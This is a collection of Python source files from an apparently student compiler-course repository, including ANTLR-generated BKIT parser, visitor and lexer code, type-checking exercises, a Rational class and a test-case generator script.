\"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\" ]\n\n RULE_program = 0\n\n ruleNames = [ \"program\" ]\n\n EOF = Token.EOF\n REAL_NUMBER=1\n ID=2\n ILLEGAL_ESCAPE=3\n UNCLOSE_STRING=4\n COMMENT=5\n UNTERMINATED_COMMENT=6\n ERROR_CHAR=7\n WS=8\n Integer_literal=9\n Float_literal=10\n Boolean_literal=11\n String_literal=12\n BODY=13\n BREAK=14\n CONTINUE=15\n DO=16\n ELSE=17\n ELSELF=18\n ELSEIF=19\n ENDBODY=20\n ENDFOR=21\n ENDWHILE=22\n FOR=23\n FUNCTION=24\n IF=25\n PARAMETER=26\n RETURN=27\n THEN=28\n VAR=29\n WHILE=30\n TRUE=31\n FALSE=32\n ENDDO=33\n PLUS_INT=34\n PLUS_FLOAT=35\n MINUS_INT=36\n MINUS_FLOAT=37\n STAR_INT=38\n STAR_FLOAT=39\n DIV_INT=40\n DIV_FLOAT=41\n MOD=42\n NOT=43\n AND=44\n OR=45\n EQUAL=46\n NOT_EQUAL_INT=47\n LESS_INT=48\n GREATER_INT=49\n LESS_OR_EQUAL_INT=50\n GREATER_OR_EQUAL_INT=51\n NOT_EQUAL_FLOAT=52\n LESS_FLOAT=53\n GREATER_FLOAT=54\n LESS_OR_EQUAL_FLOAT=55\n GREATER_OR_EQUAL_FLOAT=56\n LEFT_PAREN=57\n RIGHT_PARENT=58\n LEFT_BRACKET=59\n RIGHT_BRACKET=60\n LEFT_BRACE=61\n RIGHT_BRACE=62\n COLON=63\n DOT=64\n SEMI=65\n COMMA=66\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitProgram\" ):\n return visitor.visitProgram(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n try:\n self.enterOuterAlt(localctx, 1)\n\n except 
RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n\n\n" }, { "alpha_fraction": 0.46404793858528137, "alphanum_fraction": 0.4833555221557617, "avg_line_length": 25.36842155456543, "blob_id": "cdb5dbb79ba7909b4ad42a436a990e58b551b460", "content_id": "a3d925bd145fc80a555e80b40bbde89751893482", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1502, "license_type": "no_license", "max_line_length": 83, "num_lines": 57, "path": "/type/Q1.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "class Exp(ABC): pass #abstract class\n\nclass BinOp(Exp): pass #op:str,e1:Exp,e2:Exp #op is +,-,*,/,&&,||, >, <, ==, or !=\n\nclass UnOp(Exp): pass #op:str,e:Exp #op is -, !\n\nclass IntLit(Exp): pass #val:int\n\nclass FloatLit(Exp): pass #val:float\n\nclass BoolLit(Exp): pass #val:bool\n\nclass StaticCheck(Visitor):\n\n def visitBinOp(self,ctx:BinOp,o):\n e1 = self.visit(ctx.e1, o)\n e2 = self.visit(ctx.e2, o)\n if ctx.op in ['+', '-', '*']:\n if e1*e2 == 0:\n raise TypeMismatchInExpression(ctx)\n if e1*e2 < 0:\n return -1\n else:\n return 1\n if ctx.op in ['/']:\n if e1*e2 == 0:\n raise TypeMismatchInExpression(ctx)\n return -1\n \n if ctx.op in ['&&', '||']:\n if (e1 + e2):\n raise TypeMismatchInExpression(ctx)\n return 0\n else:\n if e1 != e2:\n raise TypeMismatchInExpression(ctx)\n return 0\n\n def visitUnOp(self,ctx:UnOp,o):\n e = self.visit(ctx.e, o)\n if ctx.op in ['-']:\n if e == 0:\n raise TypeMismatchInExpression(ctx)\n return e\n if ctx.op in ['!']:\n if e != 0:\n raise TypeMismatchInExpression(ctx)\n return e\n\n def visitIntLit(self,ctx:IntLit,o):\n return 1\n\n def visitFloatLit(self,ctx,o):\n return -1\n\n def visitBoolLit(self,ctx,o):\n return 0" }, { "alpha_fraction": 0.6164095401763916, "alphanum_fraction": 0.6178120374679565, "avg_line_length": 
32.1860466003418, "blob_id": "a68660cecb56e13f51d2b7723ce3edafed00b4fe", "content_id": "9f59380393d6fe77ca1999d87c0a3be2791c9426", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1426, "license_type": "no_license", "max_line_length": 85, "num_lines": 43, "path": "/type/Q4_name.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "from functools import reduce\nclass StaticCheck(Visitor):\n \n def visitProgram(self,ctx:Program,o:object):\n env = reduce(lambda lst,x: lst + [self.visit(x,lst)], ctx.decl, [])\n\n def visitVarDecl(self,ctx:VarDecl,o:object):\n if ctx.name in o:\n raise RedeclaredVariable(ctx.name)\n else:\n return ctx.name\n\n def visitConstDecl(self,ctx:ConstDecl,o:object):\n if ctx.name in o:\n raise RedeclaredConstant(ctx.name)\n else:\n return ctx.name\n\n def visitFuncDecl(self,ctx:FuncDecl,o:object):\n if ctx.name in o:\n raise RedeclaredFunction(ctx.name)\n else:\n param = reduce(lambda lst, x: lst + [self.visit(x, lst)], ctx.param, [])\n decl = reduce(lambda lst, x: lst + [self.visit(x, lst)], ctx.body[0], [])\n env = o + [ctx.name] + param + decl\n exe=list(map(lambda x: self.visit(x,env), ctx.body[1]))\n return ctx.name\n\n\n def visitIntType(self,ctx:IntType,o:object): pass\n\n def visitFloatType(self,ctx:FloatType,o:object):pass\n\n def visitIntLit(self,ctx:IntLit,o:object):pass\n def visitIntType(self,ctx:IntType,o:object):pass\n\n def visitFloatType(self,ctx:FloatType,o:object):pass\n\n def visitIntLit(self,ctx:IntLit,o:object):pass\n\n def visitId(self,ctx:Id,o:object):\n if ctx.name not in o:\n raise UndeclaredIdentifier(ctx.name)" }, { "alpha_fraction": 0.49685534834861755, "alphanum_fraction": 0.5062893033027649, "avg_line_length": 24.479999542236328, "blob_id": "2aeb6e672089de75c6c7fb439330fa814de0c0b2", "content_id": "1138ba4b0b399cf3572bd27f56dd05b884e09036", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 636, "license_type": "no_license", "max_line_length": 112, "num_lines": 25, "path": "/OOP/Question2.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "class Rational:\n def __init__(self, n=0, d=1):\n g = self.__gcd(n, d)\n self.number = int(n / g)\n self.denom = int(d / g)\n \n def __gcd(self, n, d):\n if d == 0:\n return n\n else:\n return self.__gcd(d, n%d)\n\n def __add__(self, op):\n if isinstance(op, int):\n return self + Rational(op)\n return Rational((int(self.number * op.denom) + int(self.denom * op.number)), int(self.denom * op.denom))\n\n def toString(self):\n return str(self.number) + \"/\" + str(self.denom)\n\na = Rational(6, 4)\nb = 2\nc = a + b\nprint(a.toString())\nprint(c.toString())" }, { "alpha_fraction": 0.7208307981491089, "alphanum_fraction": 0.7251068949699402, "avg_line_length": 31.261083602905273, "blob_id": "7db8d81c147777e31264977f8ea493b3e11f09da", "content_id": "a5925b5534b56e841ad3eb02bb25f48f2afa0fcc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6548, "license_type": "no_license", "max_line_length": 88, "num_lines": 203, "path": "/Assignments/assignment3/target/main/bkit/parser/BKITVisitor.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from main/bkit/parser/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nif __name__ is not None and \".\" in __name__:\n from .BKITParser import BKITParser\nelse:\n from BKITParser import BKITParser\n\n# This class defines a complete generic visitor for a parse tree produced by BKITParser.\n\nclass BKITVisitor(ParseTreeVisitor):\n\n # Visit a parse tree produced by BKITParser#program.\n def visitProgram(self, ctx:BKITParser.ProgramContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#var_declare.\n def visitVar_declare(self, ctx:BKITParser.Var_declareContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by 
BKITParser#function_declare.\n def visitFunction_declare(self, ctx:BKITParser.Function_declareContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#stmt_list.\n def visitStmt_list(self, ctx:BKITParser.Stmt_listContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#stmt.\n def visitStmt(self, ctx:BKITParser.StmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#if_stmt.\n def visitIf_stmt(self, ctx:BKITParser.If_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#var_declare_stmt.\n def visitVar_declare_stmt(self, ctx:BKITParser.Var_declare_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#for_stmt.\n def visitFor_stmt(self, ctx:BKITParser.For_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#while_stmt.\n def visitWhile_stmt(self, ctx:BKITParser.While_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#dowhile_stmt.\n def visitDowhile_stmt(self, ctx:BKITParser.Dowhile_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#assign_stmt.\n def visitAssign_stmt(self, ctx:BKITParser.Assign_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#break_stmt.\n def visitBreak_stmt(self, ctx:BKITParser.Break_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#continue_stmt.\n def visitContinue_stmt(self, ctx:BKITParser.Continue_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#call_stmt.\n def visitCall_stmt(self, ctx:BKITParser.Call_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#return_stmt.\n def visitReturn_stmt(self, 
ctx:BKITParser.Return_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr.\n def visitExpr(self, ctx:BKITParser.ExprContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr1.\n def visitExpr1(self, ctx:BKITParser.Expr1Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr2.\n def visitExpr2(self, ctx:BKITParser.Expr2Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr3.\n def visitExpr3(self, ctx:BKITParser.Expr3Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr4.\n def visitExpr4(self, ctx:BKITParser.Expr4Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr5.\n def visitExpr5(self, ctx:BKITParser.Expr5Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr6.\n def visitExpr6(self, ctx:BKITParser.Expr6Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#array_cell.\n def visitArray_cell(self, ctx:BKITParser.Array_cellContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr7.\n def visitExpr7(self, ctx:BKITParser.Expr7Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr8.\n def visitExpr8(self, ctx:BKITParser.Expr8Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#operand.\n def visitOperand(self, ctx:BKITParser.OperandContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#function_call.\n def visitFunction_call(self, ctx:BKITParser.Function_callContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#index_op.\n def visitIndex_op(self, ctx:BKITParser.Index_opContext):\n return self.visitChildren(ctx)\n\n\n # Visit a 
parse tree produced by BKITParser#array.\n def visitArray(self, ctx:BKITParser.ArrayContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#primitive_data.\n def visitPrimitive_data(self, ctx:BKITParser.Primitive_dataContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#array_lit.\n def visitArray_lit(self, ctx:BKITParser.Array_litContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#var_list.\n def visitVar_list(self, ctx:BKITParser.Var_listContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#var_init.\n def visitVar_init(self, ctx:BKITParser.Var_initContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#var_non_init.\n def visitVar_non_init(self, ctx:BKITParser.Var_non_initContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#composite_var.\n def visitComposite_var(self, ctx:BKITParser.Composite_varContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#composite_init.\n def visitComposite_init(self, ctx:BKITParser.Composite_initContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#primitive_init.\n def visitPrimitive_init(self, ctx:BKITParser.Primitive_initContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#params_list.\n def visitParams_list(self, ctx:BKITParser.Params_listContext):\n return self.visitChildren(ctx)\n\n\n\ndel BKITParser" }, { "alpha_fraction": 0.5095419883728027, "alphanum_fraction": 0.5839694738388062, "avg_line_length": 28.16666603088379, "blob_id": "230718114f50f0a6d7c23d73d606785f0064f858", "content_id": "e8025c7a8a72fa67eba9ef82efaa3d684eb38602", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 524, "license_type": "no_license", 
"max_line_length": 91, "num_lines": 18, "path": "/FP/Question3.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "def lessThan1(n, lst):\n return [x for x in lst if x < n]\n\ndef lessThan2(n, lst):\n return ([lst[0]] if lst[0] < n else []) + lessThan2(n, lst[1:]) if len(lst) > 0 else []\n\ndef lessThan3(n, lst):\n return list(filter(lambda x : x < n, lst))\n\ndef lessThan4(n, lst):\n from functools import reduce\n return list(reduce(lambda a,b: a + [b] if b < n else a, lst, []))\n\n# print(lessThan1(50, [1,2,50]))\n# print(lessThan2(50, [1, 2, 50]))\n# print(lessThan3(50, [1, 2, 50]))\nprint(lessThan4(50, [1, 2, 50]))\n# a = 2 + [1]" }, { "alpha_fraction": 0.48810499906539917, "alphanum_fraction": 0.49220672249794006, "avg_line_length": 35.93939208984375, "blob_id": "8b5d06939801321e544fcee3349cada1050e950d", "content_id": "91bde3fa92544d45b68e35517ac42768ebbbcec7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2438, "license_type": "no_license", "max_line_length": 257, "num_lines": 66, "path": "/Assignments/assignment1/src/genTest.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "import sys,os\n\ndef gen_lexer_testcase():\n f = open(\"./test/LexerSuite.py\", \"a\")\n done = False\n idx = int(input(\"Start index: \"))\n while not done:\n print(\"Enter the input (type donein to end the input, stop to end the genprocess): \")\n lines = []\n line_idx=1\n while True:\n line = input(\"#\" + str(line_idx) + \": \",)\n line_idx+=1\n if line == \"stop\":\n f.close()\n return\n if line != \"donein\":\n lines.append(line)\n else:\n break\n input_str = '\\n'.join(lines)\n expect_str = str(input(\"Enter the expected tokens separates by comma without <EOF>: \")) + \",<EOF>\"\n testcase_name = str(input(\"Enter the name without prefix test_: \"))\n testcase = \"\\n def test_\" + testcase_name + \"(self):\\n input=\\\"\\\"\\\"\" + input_str + \"\\\"\\\"\\\"\\n 
expect=\\\"\\\"\\\"\"+ expect_str + \"\\\"\\\"\\\"\\n num=\"+str(idx) + \"\\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\\n\\n\"\n idx+=1\n f.write(testcase)\n f.close()\n\ndef gen_parser_testcase():\n f = open(\"./test/ParserSuite.py\", \"a\")\n done = False\n idx = int(input(\"Start index: \"))\n while not done:\n print(\"Enter the input (type donein to end the input, stop to end the genprocess): \")\n lines = []\n line_idx=1\n while True:\n line = input(\"#\" + str(line_idx) + \": \",)\n line_idx+=1\n if line == \"stop\":\n f.close()\n return\n if line != \"donein\":\n lines.append(line)\n else:\n break\n input_str = '\\n'.join(lines)\n expect_str = str(input(\"Enter the expected result: \"))\n testcase_name = str(input(\"Enter the name without prefix test_: \"))\n testcase = \"\\n def test_\" + testcase_name + \"(self):\\n input=\\\"\\\"\\\"\" + input_str + \"\\\"\\\"\\\"\\n expect=\\\"\\\"\\\"\"+ expect_str + \"\\\"\\\"\\\"\\n num=\"+str(idx) + \"\\n self.assertTrue(TestParser.checkParser(input, expect, num))\\n\\n\"\n idx+=1\n f.write(testcase)\n f.close()\n\ndef main(argv):\n if len(argv) < 1:\n argv.append(str(input(\"Please enter mode (lexer/parser): \")))\n\n if argv[0] == \"lexer\":\n gen_lexer_testcase()\n\n if argv[0] == \"parser\":\n gen_parser_testcase()\n\nif __name__ ==\"__main__\":\n main(sys.argv[1:])\n" }, { "alpha_fraction": 0.30214396119117737, "alphanum_fraction": 0.5551301836967468, "avg_line_length": 55.7739143371582, "blob_id": "68dd4dad49ec3705b0e158b472f68705e0826e62", "content_id": "b95e8e9fdac13343abba39800167ec91d5ec72f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13060, "license_type": "no_license", "max_line_length": 116, "num_lines": 230, "path": "/SyntaxAnalysis/tut/src/main/bkit/parser/.antlr/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from 
/home/nguyendat/Documents/projects/PPL/SyntaxAnalysis/tut/src/main/bkit/parser/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\nfrom lexererr import *\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2\\36\")\n buf.write(\"\\u0129\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\")\n buf.write(\"\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\")\n buf.write(\"\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\")\n buf.write(\"\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\")\n buf.write(\"\\4\\31\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\")\n buf.write(\"\\t\\36\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\")\n buf.write(\"\\4&\\t&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\4,\\t,\\4-\\t-\\3\\2\")\n buf.write(\"\\3\\2\\3\\3\\3\\3\\3\\4\\3\\4\\3\\5\\3\\5\\5\\5d\\n\\5\\3\\6\\3\\6\\5\\6h\\n\\6\")\n buf.write(\"\\3\\6\\6\\6k\\n\\6\\r\\6\\16\\6l\\3\\7\\3\\7\\7\\7q\\n\\7\\f\\7\\16\\7t\\13\")\n buf.write(\"\\7\\3\\b\\6\\bw\\n\\b\\r\\b\\16\\bx\\3\\b\\3\\b\\5\\b}\\n\\b\\3\\b\\5\\b\\u0080\")\n buf.write(\"\\n\\b\\3\\t\\3\\t\\3\\t\\3\\n\\3\\n\\3\\n\\3\\13\\3\\13\\3\\13\\3\\f\\3\\f\\3\")\n buf.write(\"\\f\\5\\f\\u008e\\n\\f\\3\\r\\3\\r\\3\\16\\3\\16\\3\\17\\3\\17\\3\\17\\3\\17\")\n buf.write(\"\\5\\17\\u0098\\n\\17\\3\\17\\6\\17\\u009b\\n\\17\\r\\17\\16\\17\\u009c\")\n buf.write(\"\\3\\20\\6\\20\\u00a0\\n\\20\\r\\20\\16\\20\\u00a1\\3\\21\\3\\21\\3\\21\")\n buf.write(\"\\3\\21\\5\\21\\u00a8\\n\\21\\3\\21\\6\\21\\u00ab\\n\\21\\r\\21\\16\\21\")\n buf.write(\"\\u00ac\\3\\22\\3\\22\\3\\22\\5\\22\\u00b2\\n\\22\\3\\23\\3\\23\\3\\24\\3\")\n buf.write(\"\\24\\7\\24\\u00b8\\n\\24\\f\\24\\16\\24\\u00bb\\13\\24\\3\\24\\3\\24\\3\")\n 
buf.write(\"\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\26\\3\\26\\3\\26\\3\\26\")\n buf.write(\"\\3\\27\\3\\27\\3\\27\\3\\27\\3\\27\\3\\27\\3\\30\\3\\30\\3\\31\\3\\31\\3\\32\")\n buf.write(\"\\3\\32\\3\\33\\3\\33\\3\\34\\3\\34\\3\\35\\3\\35\\3\\36\\3\\36\\3\\37\\3\\37\")\n buf.write(\"\\3 \\3 \\3!\\3!\\3\\\"\\3\\\"\\3#\\3#\\3$\\3$\\3%\\3%\\3&\\3&\\3\\'\\3\\'\\3\")\n buf.write(\"\\'\\7\\'\\u00f1\\n\\'\\f\\'\\16\\'\\u00f4\\13\\'\\3(\\3(\\7(\\u00f8\\n\")\n buf.write(\"(\\f(\\16(\\u00fb\\13(\\3(\\3(\\3)\\3)\\7)\\u0101\\n)\\f)\\16)\\u0104\")\n buf.write(\"\\13)\\3)\\3)\\3*\\3*\\3*\\3*\\7*\\u010c\\n*\\f*\\16*\\u010f\\13*\\3\")\n buf.write(\"*\\3*\\3*\\3*\\3*\\3+\\3+\\3+\\3+\\7+\\u011a\\n+\\f+\\16+\\u011d\\13\")\n buf.write(\"+\\3+\\3+\\3,\\3,\\3-\\6-\\u0124\\n-\\r-\\16-\\u0125\\3-\\3-\\4\\u010d\")\n buf.write(\"\\u011b\\2.\\3\\2\\5\\2\\7\\2\\t\\2\\13\\2\\r\\2\\17\\2\\21\\2\\23\\2\\25\\2\")\n buf.write(\"\\27\\2\\31\\2\\33\\2\\35\\2\\37\\2!\\2#\\3%\\4\\'\\5)\\6+\\7-\\b/\\t\\61\")\n buf.write(\"\\n\\63\\13\\65\\f\\67\\r9\\16;\\17=\\20?\\21A\\22C\\23E\\24G\\25I\\26\")\n buf.write(\"K\\27M\\30O\\31Q\\32S\\33U\\34W\\35Y\\36\\3\\2\\r\\3\\2c|\\3\\2C\\\\\\3\")\n buf.write(\"\\2\\62;\\4\\2GGgg\\3\\2\\60\\60\\t\\2))^^ddhhppttvv\\7\\2\\n\\f\\16\")\n buf.write(\"\\17$$))^^\\5\\2\\62;CHch\\3\\2\\629\\4\\2\\60\\60AA\\5\\2\\13\\f\\16\")\n buf.write(\"\\17\\\"\\\"\\2\\u0130\\2#\\3\\2\\2\\2\\2%\\3\\2\\2\\2\\2\\'\\3\\2\\2\\2\\2)\\3\")\n buf.write(\"\\2\\2\\2\\2+\\3\\2\\2\\2\\2-\\3\\2\\2\\2\\2/\\3\\2\\2\\2\\2\\61\\3\\2\\2\\2\\2\")\n buf.write(\"\\63\\3\\2\\2\\2\\2\\65\\3\\2\\2\\2\\2\\67\\3\\2\\2\\2\\29\\3\\2\\2\\2\\2;\\3\")\n buf.write(\"\\2\\2\\2\\2=\\3\\2\\2\\2\\2?\\3\\2\\2\\2\\2A\\3\\2\\2\\2\\2C\\3\\2\\2\\2\\2E\")\n buf.write(\"\\3\\2\\2\\2\\2G\\3\\2\\2\\2\\2I\\3\\2\\2\\2\\2K\\3\\2\\2\\2\\2M\\3\\2\\2\\2\\2\")\n buf.write(\"O\\3\\2\\2\\2\\2Q\\3\\2\\2\\2\\2S\\3\\2\\2\\2\\2U\\3\\2\\2\\2\\2W\\3\\2\\2\\2\")\n 
buf.write(\"\\2Y\\3\\2\\2\\2\\3[\\3\\2\\2\\2\\5]\\3\\2\\2\\2\\7_\\3\\2\\2\\2\\tc\\3\\2\\2\")\n buf.write(\"\\2\\13e\\3\\2\\2\\2\\rn\\3\\2\\2\\2\\17v\\3\\2\\2\\2\\21\\u0081\\3\\2\\2\\2\")\n buf.write(\"\\23\\u0084\\3\\2\\2\\2\\25\\u0087\\3\\2\\2\\2\\27\\u008d\\3\\2\\2\\2\\31\")\n buf.write(\"\\u008f\\3\\2\\2\\2\\33\\u0091\\3\\2\\2\\2\\35\\u0097\\3\\2\\2\\2\\37\\u009f\")\n buf.write(\"\\3\\2\\2\\2!\\u00a7\\3\\2\\2\\2#\\u00b1\\3\\2\\2\\2%\\u00b3\\3\\2\\2\\2\")\n buf.write(\"\\'\\u00b5\\3\\2\\2\\2)\\u00be\\3\\2\\2\\2+\\u00c5\\3\\2\\2\\2-\\u00c9\")\n buf.write(\"\\3\\2\\2\\2/\\u00cf\\3\\2\\2\\2\\61\\u00d1\\3\\2\\2\\2\\63\\u00d3\\3\\2\")\n buf.write(\"\\2\\2\\65\\u00d5\\3\\2\\2\\2\\67\\u00d7\\3\\2\\2\\29\\u00d9\\3\\2\\2\\2\")\n buf.write(\";\\u00db\\3\\2\\2\\2=\\u00dd\\3\\2\\2\\2?\\u00df\\3\\2\\2\\2A\\u00e1\\3\")\n buf.write(\"\\2\\2\\2C\\u00e3\\3\\2\\2\\2E\\u00e5\\3\\2\\2\\2G\\u00e7\\3\\2\\2\\2I\\u00e9\")\n buf.write(\"\\3\\2\\2\\2K\\u00eb\\3\\2\\2\\2M\\u00ed\\3\\2\\2\\2O\\u00f5\\3\\2\\2\\2\")\n buf.write(\"Q\\u00fe\\3\\2\\2\\2S\\u0107\\3\\2\\2\\2U\\u0115\\3\\2\\2\\2W\\u0120\\3\")\n buf.write(\"\\2\\2\\2Y\\u0123\\3\\2\\2\\2[\\\\\\t\\2\\2\\2\\\\\\4\\3\\2\\2\\2]^\\t\\3\\2\\2\")\n buf.write(\"^\\6\\3\\2\\2\\2_`\\t\\4\\2\\2`\\b\\3\\2\\2\\2ad\\5\\3\\2\\2bd\\5\\5\\3\\2c\")\n buf.write(\"a\\3\\2\\2\\2cb\\3\\2\\2\\2d\\n\\3\\2\\2\\2eg\\t\\5\\2\\2fh\\5\\61\\31\\2g\")\n buf.write(\"f\\3\\2\\2\\2gh\\3\\2\\2\\2hj\\3\\2\\2\\2ik\\5\\7\\4\\2ji\\3\\2\\2\\2kl\\3\")\n buf.write(\"\\2\\2\\2lj\\3\\2\\2\\2lm\\3\\2\\2\\2m\\f\\3\\2\\2\\2nr\\t\\6\\2\\2oq\\5\\7\")\n buf.write(\"\\4\\2po\\3\\2\\2\\2qt\\3\\2\\2\\2rp\\3\\2\\2\\2rs\\3\\2\\2\\2s\\16\\3\\2\\2\")\n buf.write(\"\\2tr\\3\\2\\2\\2uw\\5\\7\\4\\2vu\\3\\2\\2\\2wx\\3\\2\\2\\2xv\\3\\2\\2\\2x\")\n buf.write(\"y\\3\\2\\2\\2y\\177\\3\\2\\2\\2z|\\5\\r\\7\\2{}\\5\\13\\6\\2|{\\3\\2\\2\\2\")\n buf.write(\"|}\\3\\2\\2\\2}\\u0080\\3\\2\\2\\2~\\u0080\\5\\13\\6\\2\\177z\\3\\2\\2\\2\")\n 
buf.write(\"\\177~\\3\\2\\2\\2\\u0080\\20\\3\\2\\2\\2\\u0081\\u0082\\7^\\2\\2\\u0082\")\n buf.write(\"\\u0083\\n\\7\\2\\2\\u0083\\22\\3\\2\\2\\2\\u0084\\u0085\\7^\\2\\2\\u0085\")\n buf.write(\"\\u0086\\t\\7\\2\\2\\u0086\\24\\3\\2\\2\\2\\u0087\\u0088\\7)\\2\\2\\u0088\")\n buf.write(\"\\u0089\\7$\\2\\2\\u0089\\26\\3\\2\\2\\2\\u008a\\u008e\\n\\b\\2\\2\\u008b\")\n buf.write(\"\\u008e\\5\\23\\n\\2\\u008c\\u008e\\5\\25\\13\\2\\u008d\\u008a\\3\\2\")\n buf.write(\"\\2\\2\\u008d\\u008b\\3\\2\\2\\2\\u008d\\u008c\\3\\2\\2\\2\\u008e\\30\")\n buf.write(\"\\3\\2\\2\\2\\u008f\\u0090\\t\\t\\2\\2\\u0090\\32\\3\\2\\2\\2\\u0091\\u0092\")\n buf.write(\"\\t\\n\\2\\2\\u0092\\34\\3\\2\\2\\2\\u0093\\u0094\\7\\62\\2\\2\\u0094\\u0098\")\n buf.write(\"\\7z\\2\\2\\u0095\\u0096\\7\\62\\2\\2\\u0096\\u0098\\7Z\\2\\2\\u0097\")\n buf.write(\"\\u0093\\3\\2\\2\\2\\u0097\\u0095\\3\\2\\2\\2\\u0098\\u009a\\3\\2\\2\\2\")\n buf.write(\"\\u0099\\u009b\\5\\31\\r\\2\\u009a\\u0099\\3\\2\\2\\2\\u009b\\u009c\")\n buf.write(\"\\3\\2\\2\\2\\u009c\\u009a\\3\\2\\2\\2\\u009c\\u009d\\3\\2\\2\\2\\u009d\")\n 